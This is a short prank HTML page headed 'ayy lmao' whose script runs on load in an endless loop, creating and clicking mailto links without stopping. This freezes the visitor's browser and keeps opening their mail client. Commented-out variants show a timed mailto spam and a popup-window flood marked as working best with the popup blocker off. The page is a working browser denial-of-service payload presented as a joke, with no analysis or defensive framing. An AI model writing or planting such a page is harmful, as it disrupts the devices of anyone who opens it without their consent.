<html>
<head>
</head>
<body>
<h1>ayy lmao</h1>
<script>
//setInterval("var v = document.createElement('a');v.href='mailto:ayylmao@alients.net?subject=AYY%20LMAO&body=AYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAOAYY%20LMAO';v.innerHTML = 'Ayy Lmao';document.body.appendChild(v);v.click();",1);


while(true) {
	var v = document.createElement("a");
	v.href="mailto:ayylmao@alients.net";
	v.innerHTML = "Ayy Lmao";
	document.body.appendChild(v);
	v.click();
}

/*

// best when popup blocker disabled
while(true) {
	var w = window.open("http://ayylmao.com");
}
*/


</script>
</body>
</html>
